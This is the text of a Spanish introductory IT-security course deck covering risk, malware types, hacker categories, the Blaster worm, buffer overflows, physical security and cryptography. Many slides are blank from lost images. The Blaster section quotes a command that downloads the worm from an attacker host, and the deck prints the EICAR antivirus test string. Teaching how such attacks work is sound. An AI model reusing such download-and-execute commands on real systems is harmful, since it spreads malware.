SlideShare una empresa de Scribd logo
1 de 73
Descargar para leer sin conexión
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
1. INTRODUCCIÓN
	
  
¿Qué activos se deben proteger?
	
   • Hardware: estaciones de trabajo, servidores, routers, switches, firewalls, centralitas privadas de telefonía, …
	
  • Software: sistemas operativos y aplicaciones, firmware de los dispositivos de red.
	
  • Datos: almacenados y transferidos a través de una red privada ó pública.
	
  
¿Cómo se protegen estos activos?
	
   • Seguridad física: se definen métodos para garantizar la seguridad del hardware
	
  • Seguridad lógica: se definen métodos para garantizar la seguridad del software y de los datos
	
  
Definiciones:
	
   •  Amenaza una persona, cosa, evento o idea que supone algún peligro para un activo (en términos de
confidencialidad, integridad, disponibilidad o uso legítimo)
	
  • Ataque: es la realización de una amenaza.
	
  • Defensas: medidas de protección ante las amenazas.
	
  • Vulnerabilidades: puntos débiles en las defensas o inexistencia de éstas.
	
  
1	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
1. INTRODUCCIÓN
	
  
2	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
1. INTRODUCCIÓN
	
  
Riesgo
	
   Medida del coste de una vulnerabilidad (teniendo en cuenta la ejecución de un ataque exitoso). El riesgo es
	
  alto si valor_activo*probailidad_exito_ataque es elevada. El riesgo es bajo si valor_activo*probailidad_exito_
ataque es bajo.
	
  
Ejemplo de modelo para la valoración del riesgo de un activo
	
  
Metodologías para valoración de riesgos:
	
   • CERT
	
  • Microsoft
	
  • NIST
	
  
3	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
1. INTRODUCCIÓN
	
  
¿Es posible proteger totalmente un activo?
	
   Cuatro condiciones son necesarias para considerar que un activo informático está asegurado casi al 100%:
	
  • Confidencialidad: la información es almacenada o enviada a través de la red oculta para cualquier usuario
excepto para el destinatario final. Se suele garantizar la confidencialidad con el cifrado de la información.
	
  • Autenticación: la persona, proceso o activo que acceda a la información debe previamente ser autenticado.
La autenticación puede conseguirse mediante uno (o más de uno) de los siguientes factores:
	
  
• Integridad: protección de datos ante la modificación de la información. Este servicio se facilita mediante un
mecanismo de criptografía denominado Message Authentication Code o firma digital.
	
  • No repudio: cualidad por la que una persona u ordenador no puede negar haber realizado una transmisión.
	
  
Modelo de red segura
	
  
4	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Amenazas físicas
	
   Dentro de las amenazas físicas podemos englobar cualquier error o daño en el hardware que se puede presentar
en cualquier momento. Por ejemplo, daños en discos duros, en los procesadores, errores de funcionamiento de la
memoria, etc. Todos ellos hacen que la información o no esté accesible o no sea fiable.
	
  
Otro tipo de amenazas físicas son las catástrofes naturales. Por ejemplo hay zonas geográficas del planeta en
las que las probabilidades de sufrir terremotos, huracanes, inundaciones, etc, son mucho mas elevadas. En estos
casos en los que es la propia Naturaleza la que ha provocado el desastre de seguridad, no por ello hay que
descuidarlo e intentar prever al máximo este tipo de situaciones.
	
  
Hay otro tipo de catástrofes que se conocen como de riesgo poco probable. Dentro de este grupo tenemos los
	
  taques nucleares, impactos de meteoritos, etc. y que, aunque se sabe que están ahí, las probabilidades de que se
desencadenen son muy bajas y en principio no se toman medidas contra ellos.
	
  
Windsord
	
  
Indonesia
Robos
Fokushima
	
  
Corte eléctrico
	
   5	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE)
	
   Existen desde mediados de los ’80. Inicialmente la distribuciyn se realizaba a partir de la tecnología de
	
  intercambio de información más popular: el diskette. Desde entonces, los avances en las tecnologías de redes
y en los diversos servicios de intercambio de informaciyn han sido aprovechados por formas diversas de “cydigo
malicioso”:
	
  • Virus: malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o
	
   el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados
con el código de este. Los virus informáticos tienen, básicamente, la función de propagarse a través de un
software, no se replican a sí mismos porque no tienen esa facultad como el gusano informático, son muy
	
  nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos
	
  • Spyware: Programas espía que recopilan información sobre una persona o una organización sin su
	
   conocimiento. Esta información luego puede ser cedida o vendida a empresas publicitarias. Pueden recopilar
información del teclado de la víctima pudiendo así conocer contraseña o nº de cuentas bancarias o pines.
	
  • Adware: Programas que abren ventanas emergentes mostrando publicidad de productos y servicios. Se suele
utilizar para subvencionar la aplicación y que el usuario pueda bajarla gratis u obtener un descuento.
Normalmente el usuario es consciente de ello y da su permiso.
	
  • Worms (“Gusanos”): tienen la capacidad de replicarse a si mismos y son independientes de otros programas o
componentes de software. Infectan todos los host de una red gracias a la infraestructura de datos actual.
	
  • Troyanos. Programas con “doble cara”: exterior benigno, interior destructivo. Al ejecutar el programa el
usuario suele ser distraído por un programa afable mientras que en background se está ejecutando otra
aplicación con fines dudosos, generalmente suele ser una puerta trasera o backdoor.
	
  • Phising: Intenta conseguir información confidencial de forma fraudulenta (conseguir contraseñas o pines
	
   bancarios) haciendo una suplantación de identidad. Para ello el estafador se hace pasar por una persona o
	
  empresa de la confianza del usuario mediante un correo electrónico oficial o mensajería instantánea, y de esta
forma conseguir la información.
	
  • Spam: Recepción de mensajes no solicitados. Se suele utilizar esta técnica en los correos electrónicos,
mensajería instantánea y mensajes a móviles.
	
  • Bots: programas que realizan de forma automática acciones que podría hacer una persona. Crear usuarios
irreales en webs, realizar ataques de diccionario o fuerza bruta, …
	
  
6	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE)
	
   La palabra “hacker” originalmente no tenía una connotaciyn negativa: “personas que disponían de un elevado
	
  conocimiento tecnolygico sobre ordenadores”. La acepciyn actual del término tiene su origen el los años 50 y 60,
cuando el acceso a los ordenadores era muy caro y muy limitado y, por lo tanto, la disponibilidad de tiempo de
proceso estaba altamente controlada.
	
  
El colectivo hacker no es homogéneo:
	
  • White Hat o ethical hackers: hackers especializados en metodologías de penetración cuyo objetivo es
	
   mejorar la seguridad de los sistemas informáticos de las empresas. También conocidos como sneakers.
	
  • Black Hat: hackers que vulneran los sistemas informáticos con intenciones maliciosas o de lucro personal.
	
  • Grey Hat: es una combinación de White y Black Hat. Hacker que vulnera un sistema informático y se ofrece
	
   a la empresa para solucionar el problema.
	
  •, Scipt Kiddies: hackers con bajos conocimientos que explotan las vulnerabilidades de los sistemas
informáticos con herramientas de terceros.
• Hacktivist, Blue Hat, Neophyte, …
7	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Fases del ataque de un hacker
	
  
8	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)
	
  
9	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)
	
  
10	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)
	
  
11	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)
	
  
12	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Virus
	
   El primer virus catalogado como tal, Brain virus, escrito por Basit y Amjad Alvi en Pakistan, apareció en el año
1986. Estos virtuosos desarrolladores de software crearon a Brain con la única intención de proteger, ante el
emergente "pirateo", los programas que ellos mismos creaban y comercializaban en su tienda Brain Computer
Services. No tenía payload.
	
  
Este virus, inusualmente dañino fue problemático para los usuarios del sistema operativo MS-DOS. Se alojaba
en el Boot o sector de arranque de los disquetes de 5.25 pulgadas que contenían el sistema operativo en una
versión inferior a la 2.0, En una primera instancia, cambiaba la etiqueta de volumen en los disquetes por la
de (c)Brain o similar (atendiendo a la versión) y antes de producir la infección mostraba el siguiente mensaje:
	
  
¿Cómo se replican los virus?
	
  
Memory	
  
	
  Chicks.exVirus 	
  Hard	
  Drive	
  
	
  
Draw.exe	
  
	
  Calc.exe	
  
	
  Chicks.exVirus	
  
	
  
13	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
¿Cómo se replican los virus?
	
  
Memory	
  
	
  Chicks.exVirus 	
  Hard	
  Drive	
  
	
  
Chicks.exVirus
	
  Draw.exe	
  
	
   Calc.exe	
  
	
  Chicks.exVirus	
  
	
  
Chicks.exVirus	
  
	
  
Memory 	
  Virus	
  
	
  Hard	
  Drive	
  	
  Draw.exe	
  
	
   Calc.exe	
  
	
  Chicks.exVirus	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
¿Cómo se replican los virus?
	
  
Chicks.exVirus	
  
	
  
Chicks.exVirus	
  
	
  
MemoryCalc.exe 	
  Virus	
  
	
  Hard	
  Drive	
  	
  Draw.exe	
  
	
   Calc.exeVirus	
  
	
  Chicks.exVirus	
  
	
  
Memo 	
  Virus	
  
	
  Hard	
  DriveDraw.exe	
  
	
   Calc.exeVirus	
  
	
  Chicks.exVirus	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Payload
	
   La gran mayoría de virus no contienen payload, efectos secundarios intencionados, generalmente impiden
la ejecución del fichero infectado solamente. Los payloads más comunes son:
	
  • Modificar Datos
• Exportar Datos
• Grabar voz y exportar
• Capturas de teclado y exportar
• Interceptar comunicaciones y exportar
• Cifrado de los datos locales
• Destrucción de los datos locales
• Marcado telefónico
• Insertar otro código malicioso
• Exportar Passwords
Existen más de 70.000 virus distintos, pero los más comunes son los basados en WIN32.
	
  
Técnicas de ocultación de los virus
	
   • Cifrado
	
  • Stealth: habilidad para devolver información falsa y así
	
   no ser detectados
	
  • Retrovirus: atacan directamente al software antivirus.
Normalmente borran, cambian las firmas o paran los
	
   servicios del antivirus.
	
  • Polimorfismo: habilidad de mutar cada vez que infectan
una aplicación, disco o documento. Algunos pueden
	
   llegar a tener hasta millones de formas diferentes. Este
tipo de virus es más difícil de detectar por los antivirus.
	
  
Stealth	
  Virus	
  
	
  
La casa
	
  está por
	
   allí…
	
  
Todo
	
  parece
estar bien
	
  
16	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Antivirus
	
   Los Antivirus utilizan firmas de virus para la identificación. Esta firmas son únicas para cada virus, como la
huella digitales son únicas para los humanos. El antivirus tiene una base de datos de firmas que se va
actualizando.
	
  
Heurística: técnicas que se emplean para conocer código malicioso que no se encuentra en su base de datos. Su
importancia radica en el hecho de ser la única defensa automática posible frente a la aparición de nuevos
códigos maliciosos de los que no se posea firmas.
	
  
Un antivirus está formado por las firmas o definiciones de virus, motor y la aplicación.
	
  
Para saber si tu antivirus está funcionando correctamente crea un fichero .txt con el siguiente contenido:
	
  X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*. No es un virus real,
pero tu antivirus lo detectará como tal. (www.eicar.com)
	
  
Métodos de análisis de virus
	
   BlackBox
	
  1. Se instalan varios programas de monitorización: monitorización del sistema de ficheros, registro, memoria,
actividad en la red, …
	
  2. Se ejecuta el virus
	
  3. Se comprueban los resultados de los programas de
monitorización
	
  
17	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Métodos de análisis de virus
WhiteBox
	
   Script virus son normalmente fáciles: se analiza el contenido de los scripts
	
  Macro virus son normalmente fáciles: se extrae el código macro del documento. Se analiza el contenido
de las macros
	
  El codigo Binario puede ser complicado: programa Disassemble
main()
{
	
  demo.c
	
   printf ("Demo n");
	
  
return 0; Compilador
}
	
  
demo.exe
	
  
0E 1F BA 0E 00 B4 09 CD 21 B8 Demo
	
  
demo.exe
	
  
0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21
	
  54 68 69 73 20 70 72 6F 67 72 61 6D 20 63
	
  61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07
	
  00 00 00 83 C4 04 33 C0 5D C3 93 11 04 55
	
  
4C CD 21
	
  54 68 69 73 20 70 72 6F 67 72 61 6D 20 63
61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07
00 00 00 83 C4 04 33 C0 5D C3 demo.c1 04 55
	
   Tenemos la necesidad de dar
	
  
Assembler
3591:0000 0E PUSH CS
	
  
información detallada tan rápido como
sea posible a nuestro clientes:
	
  • WhiteBox es más lento pero más
	
   detallado y exacto
	
  • BlackBox es más rápido pero
	
   menos detallado y exacto
	
  
main()
	
  
{
	
   printf ("Demo de postgrado n")
	
  return 0;
	
  }
	
  
3591:0001 1F POP DS
	
  3591:0002 BA0E00 MOV DX,000E
3591:0005 B409 MOV AH,09
	
  3591:0007 CD21 INT 21
	
  3591:0009 B8014C MOVAX,4C01
3591:000C CD21 INT 21
	
  
18	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Worms (gusanos)
	
   Un worm es un programa que se copia de un PC a otro. A diferencia de los virus, los worms no son parásitos
y no necesitan un host para infectar. Conocen la red y/o Internet. Se expanden a muchos PCs muy rápido .
Necesitan menos intervención del humano para replicarse. Ejemplos: VBS.LoveLetter.A ; SQLexploit, Blaster ...
	
  
ILOVEYO	
  
	
  
LISA	
  !!! 	
  ILILOVEYOU	
  
	
  
ILOVEYO	
  
	
  
ILOVEYOU	
  
	
   YOU	
  
	
  
ILOVEYOU	
  
	
  
OU	
  
	
  ILOV	
  
	
  
Payload
	
  
VEY	
  
	
  
ILOV	
  
	
  
Steve acaba de enviar
LoveLetter a todos en
su libreta de direcciones
	
  
• Expande el worm a TODO EL MUNDO en tu Microsoft Outlook address book vía Email o por mIRC
	
   (Internet Chat): a todos tus amigos, todos en tu empresa, todos tus clientes…
	
  • Sobrescribe tus ficheros locales/red con las siguientes extensiones con el código del worm y añade la
	
   extensión VBS vbs, vbe, js, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com,
	
  mp3 and mp2 (Ejemplo. hello.gif -> hello.gif.vbs)
	
  • Cambia la pagina de inicio de Microsoft Internet Explorer para bajar Password Stealer Trojan. Tu información
	
   RAS, ISP se envía al hacker. Modificaciones del Registro: sistema inestable debido a los cambios en el registro
	
  
19	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
¿Cómo se replican los gusanos? (Buffer overflow)
	
   Es	
  un	
  error	
  de	
  soFware	
  que	
  se	
  produce	
  cuando	
  un	
  programa	
  no	
  controla	
  adecuadamente	
  la	
  canJdad	
  de	
  datos	
  que	
  se	
  
	
  copian	
  sobre	
  un	
  área	
  de	
  memoria	
  reservada	
  a	
  tal	
  efecto	
  (buffer),	
  de	
  forma	
  que	
  si	
  dicha	
  canJdad	
  es	
  superior	
  a	
  la	
  capacidad
preasignada	
  los	
  bytes	
  sobrantes	
  se	
  almacenan	
  en	
  zonas	
  de	
  memoria	
  adyacentes,	
  sobrescribiendo	
  su	
  contenido	
  original.	
  Esto
consJtuye	
  un	
  fallo	
  de	
  programación.	
  
	
  
En	
  las	
  arquitecturas	
  comunes	
  de	
  computadoras	
  no	
  existe	
  separación	
  entre	
  las	
  zonas	
  de	
  memoria	
  dedicadas	
  a	
  datos	
  y	
  las	
  
	
  dedicadas	
  a	
  programa,	
  por	
  lo	
  que	
  los	
  bytes	
  que	
  desbordan	
  el	
  buffer	
  podrían	
  grabarse	
  donde	
  antes	
  había	
  instrucciones,	
  lo	
  que
implicaría	
  la	
  posibilidad	
  de	
  alterar	
  el	
  flujo	
  del	
  programa,	
  llevándole	
  a	
  realizar	
  operaciones	
  imprevistas	
  por	
  el	
  programador
original.	
  Esto	
  es	
  lo	
  que	
  se	
  conoce	
  como	
  una	
  vulnerabilidad.	
  
	
  
Es el área de memoria que se usa para mantener temporalmente la información. La pila del pc es un área de
memoria re-escribible que dinámicamente se encoge o estira según lo necesite o determine el programa en
ejecución. La acción de poner y quitar información de la pila funciona como LIFO. (Last In, First Out)
	
  
Para prevenir BufferOverflows:
	
  • El usuario necesita que se saque un parche
• Los desarrolladores deberían escribir código si errores
• Análisis de código buscando código sospechoso
• Compiladores que buscan o previenen stack overflows
	
   20	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Ejemplo de ataque: W32.Blaster
	
   El pc infectado busca por la red pc´s que estén escuchando en el puerto 135
	
  
Cuando descubre un PC escuchando el puerto 135 , el pc atacante intenta explotar el RPC Buffer Overflow
	
  
El Buffer Overflow incluye código que hace que la victima abra un command shell , y se ponga a escuchar
al puerto 4444
	
  
El el atacante empieza un TFTP en el puerto 69 (el cliente TFTP esta incluido en las instalaciones por defecto),
conecta al puerto 4444 y lanza el comando “tftp attacker-IP GET msblast.exe”
	
  
21	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Ejemplo de ataque: W32.Blaster
	
   El cual ejecuta la victima, y entonces se baja una copia del worm desde el atacante.A continuación lo ejecuta
(el puerto 4444 no permanece abierto)
	
  
La victima es ahora un atacante y empieza su proceso de búsqueda, la máquina atacante primera, vuelve a la
búsqueda otra vez.
	
  
22	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
¿Es difícil hacer un virus/gusano?
	
   En Internet se pueden encontrar herramientas para generar tus propios virus o worms
	
  
23	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Troyanos
	
   Código que generalmente muestra una aplicación afable al usuario y que de forma paralela ejecuta otra maliciosa
en background. Esta aplicación maliciosa suele abrir un puerto de conexión para que un hacker pueda conectarse
a la máquina infectada (backdoor) o lanza una conexión cliente contra el server de un hacker con el mismo
propósito.
	
  
24	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Troyanos
	
   ¿Es difícil crear un troyano?
	
  
Esheep.exe
	
  
25	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Las amenazas mixtas
	
   Ahora el código malware utiliza varios métodos para expandirse (mail, Irc, red, ...) y cada vez necesitan menos la
interacción del usuario, como hacer doble click en el fichero adjunto. Algunos ejemplos de amenazas mixtas son:
Codered , nimda, bugbear.B
	
  
26	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Las amenazas mixtas
	
  
27	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Las amenazas mixtas
	
  
28	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Las amenazas mixtas
	
  
29	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
2. AMENAZAS
	
  
Las amenazas mixtas
	
  
30	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
3. SEGURIDAD FÍSICA
	
  
Consiste en la aplicación de barreras físicas y procedimientos de control como medidas de prevención y
contramedidas contra las amenazas a los recursos y la información confidencial.
	
  
En muchas organizaciones se suelen tomar medidas para prevenir o detectar accesos no autorizados o negaciones
de servicio, pero rara vez para prevenir la acción de un atacante que intenta acceder físicamente a la sala de
	
  operaciones o al lugar donde se depositan las impresiones del sistema. Esto motiva que en determinadas
	
  situaciones un atacante se decline por aprovechar vulnerabilidades físicas en lugar de lógicas, ya que posiblemente
le sea más fácil robar una cinta con una imagen completa del sistema que intentar acceder a él mediante fallos en
el software.
	
  
En entornos habituales suele ser suficiente con un poco de sentido común para conseguir una mínima seguridad
	
  física; de cualquier forma, en cada institución se ha de analizar el valor de lo que se quiere proteger y la probabilidad
de las amenazas potenciales, para en función de los resultados obtenidos diseñar un plan de seguridad adecuado.
Por ejemplo, en una empresa ubicada en Valencia quizás parezca absurdo hablar de la prevención ante terremotos
(por ser esta un área de bajo riesgo), pero no sucederá lo mismo en una universidad situada en una zona
sísmicamente activa; de la misma forma, en entornos de I+D es absurdo hablar de la prevención ante un ataque
nuclear, pero en sistemas militares esta amenaza se ha de tener en cuenta.
	
  
Amenazas al hardware de una instalación informática:
	
   • Acceso físico a los sistemas con autenticación basado en algo que el usuario sabe (clave), posee (tarjeta)
o/y es (biometría). Los sistemas, equipos de comunicación, cableado troncal y conexión con los proveedores
de servicio de voz y datos deben estar cerrados bajo llave en un recinto acondicionado climatológicamente
(CPD-Centro de procesado de Datos) con un sistema de autenticación basado en al menos uno de los
métodos mencionados. Otros: videocámaras, alarmas, detectores de presencia y térmicos, …
	
  • Desastres naturales: terremotos, tormentas eléctricas, inundaciones, incendios, humedad, ruido eléctrico,
temperaturas extremas, … Como medida de prevenciyn se aconseja realizar backups periódicamente de
la información y trasladarla físicamente a otro lugar.
	
  
Es importante mantener a los empleados y al personal de seguridad alerta ante ataques de ingeniería social,
shoulder surfing, masquerading, scavenging y actos delictivos.
	
  
31	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
3. SEGURIDAD FÍSICA
	
  
32	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
Seguridad en el uso de software y los sistemas, la protección de los datos, procesos y programas, así como la
del acceso ordenado y autorizado de los usuarios a la información.
	
  
Objetivos:
	
   • Restringir el acceso a los programas y archivos.
	
  • Asegurar que los operadores puedan trabajar sin una supervisión minuciosa y no puedan modificar los
	
   programas ni los archivos que no correspondan.
	
  • Asegurar que se estén utilizados los datos, archivos y programas correctos en y por el procedimiento correcto.
	
  • Que la información transmitida sea recibida sólo por el destinatario al cual ha sido enviada y no a otro.
	
  • Que la información recibida sea la misma que ha sido transmitida.
	
  • Que existan sistemas alternativos secundarios de transmisión entre diferentes puntos.
	
  • Que se disponga de pasos alternativos de emergencia para la transmisión de información.
	
  
CRIPTOGRAFÍA
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
	
  
Cuanto mayor es la longitud de la clave menor es la probabilidad de crackeo
	
  
33	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en las comunicaciones
	
  
IDEA,	
  RC5,	
  DES,	
  3DES,	
  AES	
  
	
  
34	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en las comunicaciones
	
  
Diffie-­‐Hellman,	
  RSA,	
  
	
  Massey-­‐Omura,	
  Elgamal,
Miller	
  
	
  
35	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en las comunicaciones
	
  
Se	
  pueden	
  definir	
  como	
  documentos	
  digitales	
  firmados	
  por	
  una	
  enJdad	
  tercera	
  confiable	
  (PKI)que	
  conJene	
  
una	
  clave	
  privada	
  totalmente	
  transparente	
  para	
  el	
  usuario,	
  y	
  que	
  conJenen	
  información	
  sobre	
  este,	
  	
  
compuestos	
  ademas	
  por	
  una	
  clave	
  publica,	
  donde	
  aparece	
  información	
  del	
  propietario	
  de	
  dicha	
  clave.	
  Con	
  	
  
lo	
  anterior,	
  lo	
  que	
  se	
  pretende	
  es	
  asociar	
  la	
  clave	
  publica	
  con	
  la	
  idenJdad	
  de	
  una	
  persona	
  fisica	
  o	
  juridica	
  y	
  	
  
por	
  lo	
  tanto	
  poder	
  probar	
  la	
  autenJcidad	
  del	
  remitente	
  de	
  un	
  documento	
  firmado	
  electronicamente.	
  	
  
	
  
36	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
	
  
36	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
37	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
38	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
39	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
40	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
41	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
42	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
43	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Confidencialidad en los datos almacenados
	
  
44	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Algoritmos de hash (integridad de los datos): no necesitan una clave
	
  
45	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Algoritmos de hash (integridad de los datos)
	
  
46	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
CRIPTOGRAFÍA
	
  
Las firmas digitales garantizan la integridad y la autenticidad del mensaje:
1.  Se pasan los datos por un algoritmo de hash que genera una cadena de bits que son anexados a
los datos.
2. Antes de de enviar el mensaje se cifra con un algoritmo asimétrico utilizando la clave privada del
remitente.
La firma digital además permite añadir un sello temporal o timestamp que permite determinar si el mensaje
ha sido interceptado. Esto es importante por ejemplo en transacciones económicas.
	
  
46	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
47	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
48	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
49	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
50	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
51	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
52	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
53	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
54	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
55	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
56	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
57	
